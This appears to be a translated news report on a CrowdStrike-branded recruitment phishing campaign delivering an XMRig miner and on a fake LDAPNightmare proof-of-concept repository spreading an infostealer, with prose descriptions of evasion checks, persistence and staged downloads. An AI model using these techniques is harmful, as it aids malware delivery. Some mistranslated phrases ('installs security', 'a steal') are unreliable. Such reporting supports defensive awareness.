Cybersecurity firm CrowdStrike is warning of a phishing campaign using its own brand to distribute a cryptocurrency miner disguised as an employee CRM application as part of an alleged recruitment process.
“The attack begins with a phishing email that mimics CrowdStrike recruitment, directing recipients to a malicious website,” the company said in a statement. said. “Victims are encouraged to download and run a fake application that serves as a bootloader for the XMRig cryptominer.”
The Texas-based company said it discovered the malicious campaign on January 7, 2025, and that it was “aware of the CrowdStrike fake employment scam.”
Phishing emails lure recipients by claiming that they have been shortlisted for the next stage of the recruitment process for a junior developer role and that they need to join the conversation with the recruitment team by downloading a customer relationship management (CRM) tool provided in the embedded link
The downloaded binary, once launched, performs a series of checks to avoid detection and analysis before receiving the next stage’s payloads.
These checks include detecting the presence of a debugger and scanning the list of running processes for malware or virtualization software analysis. They also ensure that the system has a certain number of active processes and that the processor has at least two cores.
If the host satisfies all the criteria, the user is presented with an installation failed error message while secretly downloading the XMRig miner from GitHub and its corresponding configuration from another server (“93.115.172(.)41”) in the background. .
“The malware then runs the XMRig miner using command-line arguments in the downloaded configuration text file,” CrowdStrike said, adding that the executable installs security on the machine by adding a Windows batch script to the Start menu’s startup folder, which is responsible for launching Miner.
Fake LDAPNightmare PoC Targets Security Researchers
The development comes as Trend Micro revealed that a fake proof-of-concept (PoC) for a recently discovered security flaw in Microsoft’s Windows Lightweight Directory Access Protocol (LDAP) – CVE-2024-49113 (aka LDAPN’s nightmare) – is used to lure security researchers into downloading information-stealing software.”
The malicious GitHub repository in question – github(.)com/YoonJae-rep/CVE-2024-49113 (now resolved) – is considered a fork the original repository from SafeBreach Labs, which hosts a legitimate PoC.
However, the fake repository replaces the files associated with the exploit with a binary file called “poc.exe” that, when run, drops a PowerShell script to create a scheduled task to execute the Base64-encoded script. The decoded script is then used to load another script from Pastebin.
The latest stage malware is a steal that collects a machine’s public IP address, system metadata, process list, directory listings, network IP addresses, network adapters, and installed updates.
“Although the tactics of using PoC decoys as a means to deliver malware is not new, this attack remains a serious concern, especially because it exploits a trending issue that could potentially affect a larger number of victims,” said security researcher Sarah Pearl Kamling.
